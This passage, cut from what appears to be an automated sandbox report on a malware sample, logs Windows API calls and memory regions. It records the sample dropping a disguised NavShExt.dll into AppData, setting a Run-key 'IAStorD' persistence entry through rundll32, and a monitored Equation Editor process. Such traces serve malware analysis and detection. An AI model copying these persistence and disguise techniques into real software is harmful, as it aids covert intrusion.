hRequest=0x630180, dwInfoLevel=0x13, pwszName=0x0, lpBuffer=0xe2187c, lpdwBufferLength=0xe21870, lpdwIndex=0x0 | out: lpBuffer=0xe2187c*, lpdwBufferLength=0xe21870*=0x6, lpdwIndex=0x0) returned 1 [0035.449] _wtoi (_String="200") returned 200 [0035.449] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1CD60.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1cd60.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.450] WriteFile (in: hFile=0x1bc, lpBuffer=0xe21690*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0xe2168c, lpOverlapped=0x0 | out: lpBuffer=0xe21690*, lpNumberOfBytesWritten=0xe2168c*=0x269, lpOverlapped=0x0) returned 1 [0035.450] CloseHandle (hObject=0x1bc) returned 1 [0035.452] WinHttpQueryDataAvailable (in: hRequest=0x630180, lpdwNumberOfBytesAvailable=0xe218f0 | out: lpdwNumberOfBytesAvailable=0xe218f0*=0x0) returned 1 [0035.453] GetLocalTime (in: lpSystemTime=0xe150dc | out: lpSystemTime=0xe150dc*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x27, wMilliseconds=0x264)) [0035.453] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.457] GetLocalTime (in: lpSystemTime=0xdfc124 | out: lpSystemTime=0xdfc124*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x27, wMilliseconds=0x264)) [0035.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[2018-1-23 22:39:39] ConnectType 8 ok.", cchWideChar=-1, lpMultiByteStr=0xdfc134, cbMultiByte=51200, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[2018-1-23 22:39:39] ConnectType 8 ok.", lpUsedDefaultChar=0x0) returned 40 [0035.458] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.458] WinHttpCloseHandle (hInternet=0x630180) returned 1 [0035.458] WinHttpCloseHandle (hInternet=0x62fd98) returned 1 [0035.458] WinHttpCloseHandle (hInternet=0x630180) returned 0 [0035.458] WinHttpCloseHandle (hInternet=0x62fcb0) returned 1 [0035.458] WinHttpCloseHandle (hInternet=0x613918) returned 1 [0035.460] time (in: timer=0x0 | out: timer=0x0) returned 0x5a67b9ab [0035.460] srand (_Seed=0x5a67b9ab) [0035.460] rand () returned 11073 [0035.460] GetLocalTime (in: lpSystemTime=0xe151c8 | out: lpSystemTime=0xe151c8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x27, wMilliseconds=0x264)) [0035.460] _itoa (in: _Val=6, _DstBuf=0xe14e82, _Radix=10 | out: _DstBuf="6") returned="6" [0035.460] _snprintf (in: _Dest=0xe14f2c, _Count=0x200, _Format="%.6f" | out: _Dest="1.800000") returned 8 [0035.461] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.461] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x1a5e0) Thread: id = 34 os_tid = 0xb08 [0027.978] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="{2CB55487-9F5C-48D4-B6A1-2521E247A169}") returned 0xa8 [0027.978] GetLastError () returned 0x0 [0027.978] GetModuleFileNameW (in: hModule=0x74bb0000, lpFilename=0x24df774, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3")) returned 0x23 [0027.978] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0027.978] GetFileSize (in: hFile=0xb0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11c00 [0027.979] ReadFile (in: hFile=0xb0, lpBuffer=0x3856d8, nNumberOfBytesToRead=0x11c00, lpNumberOfBytesRead=0x24df768, lpOverlapped=0x0 | out: lpBuffer=0x3856d8*, lpNumberOfBytesRead=0x24df768*=0x11c00, lpOverlapped=0x0) returned 1 [0027.979] CloseHandle (hObject=0xb0) returned 1 [0027.979] GetSystemDirectoryA (in: lpBuffer=0x24df5fc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0027.979] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x24df4f8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0027.982] GetShortPathNameA (in: lpszLongPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll", lpszShortPath=0x24df4f8, cchBuffer=0x104 | out: lpszShortPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll") returned 0x0 [0027.983] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20006, phkResult=0x24df3f0 | out: phkResult=0x24df3f0*=0xc0) returned 0x0 [0027.983] RegQueryValueExA (in: hKey=0xc0, lpValueName="IAStorD", lpReserved=0x0, lpType=0x0, lpData=0x24df3f4, lpcbData=0x24df3ec*=0x104 | out: lpType=0x0, lpData=0x24df3f4*=0x0, lpcbData=0x24df3ec*=0x104) returned 0x5 [0027.983] RegSetValueExA (in: hKey=0xc0, lpValueName="IAStorD", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll,Setting", cbData=0x70 | out: lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll,Setting") returned 0x0 [0027.983] RegCloseKey (hKey=0xc0) returned 0x0 [0027.983] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x24df774, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0027.983] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft"), lpSecurityAttributes=0x0) returned 0 [0027.983] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows"), lpSecurityAttributes=0x0) returned 0 [0027.983] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches"), lpSecurityAttributes=0x0) returned 1 [0027.983] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches\\navshext.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0027.984] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches\\navshext.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc0 [0027.984] WriteFile (in: hFile=0xc0, lpBuffer=0x3856d8*, nNumberOfBytesToWrite=0x11c00, lpNumberOfBytesWritten=0x24df768, lpOverlapped=0x0 | out: lpBuffer=0x3856d8*, lpNumberOfBytesWritten=0x24df768*=0x11c00, lpOverlapped=0x0) returned 1 [0027.985] CloseHandle (hObject=0xc0) returned 1 [0027.986] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0x3a98) returned 0x102 [0043.619] GetSystemDirectoryA (in: lpBuffer=0x24df5fc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0043.619] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x24df4f8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0043.619] GetShortPathNameA (in: lpszLongPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll", lpszShortPath=0x24df4f8, cchBuffer=0x104 | out: lpszShortPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll") returned 0x46 [0043.620] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20006, phkResult=0x24df3f0 | out: phkResult=0x24df3f0*=0x1ac) returned 0x0 [0043.620] RegQueryValueExA (in: hKey=0x1ac, lpValueName="IAStorD", lpReserved=0x0, lpType=0x0, lpData=0x24df3f4, lpcbData=0x24df3ec*=0x104 | out: lpType=0x0, lpData=0x24df3f4*=0x0, lpcbData=0x24df3ec*=0x104) returned 0x5 [0043.620] RegSetValueExA (in: hKey=0x1ac, lpValueName="IAStorD", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting", cbData=0x6f | out: lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting") returned 0x0 [0043.620] RegCloseKey (hKey=0x1ac) returned 0x0 [0043.620] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x24df774, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0043.620] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft"), lpSecurityAttributes=0x0) returned 0 [0043.620] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows"), lpSecurityAttributes=0x0) returned 0 [0043.620] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches"), lpSecurityAttributes=0x0) returned 0 [0043.621] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches\\navshext.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0043.621] CloseHandle (hObject=0x1ac) returned 1 [0043.621] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0x3a98) returned 0x102 [0058.614] GetSystemDirectoryA (in: lpBuffer=0x24df5fc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.614] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x24df4f8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0058.614] GetShortPathNameA (in: lpszLongPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll", lpszShortPath=0x24df4f8, cchBuffer=0x104 | out: lpszShortPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll") returned 0x46 [0058.615] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20006, phkResult=0x24df3f0 | out: phkResult=0x24df3f0*=0x1ac) returned 0x0 [0058.615] RegQueryValueExA (in: hKey=0x1ac, lpValueName="IAStorD", lpReserved=0x0, lpType=0x0, lpData=0x24df3f4, lpcbData=0x24df3ec*=0x104 | out: lpType=0x0, lpData=0x24df3f4*=0x0, lpcbData=0x24df3ec*=0x104) returned 0x5 [0058.615] RegSetValueExA (in: hKey=0x1ac, lpValueName="IAStorD", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting", cbData=0x6f | out: lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting") returned 0x0 [0058.615] RegCloseKey (hKey=0x1ac) returned 0x0 [0058.615] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x24df774, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0058.615] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft"), lpSecurityAttributes=0x0) returned 0 [0058.615] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows"), lpSecurityAttributes=0x0) returned 0 [0058.615] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches"), lpSecurityAttributes=0x0) returned 0 [0058.615] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches\\navshext.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0058.615] CloseHandle (hObject=0x1ac) returned 1 [0058.616] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0x3a98) returned 0x102 [0073.621] GetSystemDirectoryA (in: lpBuffer=0x24df5fc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0073.621] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x24df4f8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0073.621] GetShortPathNameA (in: lpszLongPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll", lpszShortPath=0x24df4f8, cchBuffer=0x104 | out: lpszShortPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll") returned 0x46 [0073.621] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20006, phkResult=0x24df3f0 | out: phkResult=0x24df3f0*=0x1ac) returned 0x0 [0073.621] RegQueryValueExA (in: hKey=0x1ac, lpValueName="IAStorD", lpReserved=0x0, lpType=0x0, lpData=0x24df3f4, lpcbData=0x24df3ec*=0x104 | out: lpType=0x0, lpData=0x24df3f4*=0x0, lpcbData=0x24df3ec*=0x104) returned 0x5 [0073.621] RegSetValueExA (in: hKey=0x1ac, lpValueName="IAStorD", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting", cbData=0x6f | out: lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\aETAdzjz\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting") returned 0x0 [0073.621] RegCloseKey (hKey=0x1ac) returned 0x0 [0073.621] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x24df774, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0073.621] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft"), lpSecurityAttributes=0x0) returned 0 [0073.621] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows"), lpSecurityAttributes=0x0) returned 0 [0073.621] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches"), lpSecurityAttributes=0x0) returned 0 [0073.621] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\caches\\navshext.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0073.621] CloseHandle (hObject=0x1ac) returned 1 [0073.622] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0x3a98) Thread: id = 44 os_tid = 0xb4c Thread: id = 50 os_tid = 0xb68 Thread: id = 51 os_tid = 0xb6c Thread: id = 52 os_tid = 0xb84 Process: id = "4" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x54056000" os_pid = "0xafc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xa0c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 630 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 631 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 632 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 633 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 634 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 635 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 636 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 637 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 638 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 639 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 640 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 641 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 642 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 643 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 644 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 645 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 646 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 647 start_va = 0x680000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 648 start_va = 0x74b00000 end_va = 0x74b07fff entry_point = 0x74b00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 649 start_va = 0x74b10000 end_va = 0x74b6bfff entry_point = 0x74b10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 650 start_va = 0x74b70000 end_va = 0x74baefff entry_point = 0x74b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 651 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 652 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 653 start_va = 0x8f0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 654 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 655 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 656 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 657 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 658 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 659 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 660 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 661 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 662 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 663 start_va = 0x74690000 end_va = 0x74844fff entry_point = 0x74690000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 664 start_va = 0x748b0000 end_va = 0x74933fff entry_point = 0x748b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 665 start_va = 0x74940000 end_va = 0x74a0afff entry_point = 0x74940000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 666 start_va = 0x74bf0000 end_va = 0x74bfafff entry_point = 0x74bf0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 667 start_va = 0x74c00000 end_va = 0x74c16fff entry_point = 0x74c00000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 668 start_va = 0x74c20000 end_va = 0x74c84fff entry_point = 0x74c20000 region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 669 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 670 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 671 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 672 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 673 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 674 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 675 start_va = 0x75450000 end_va = 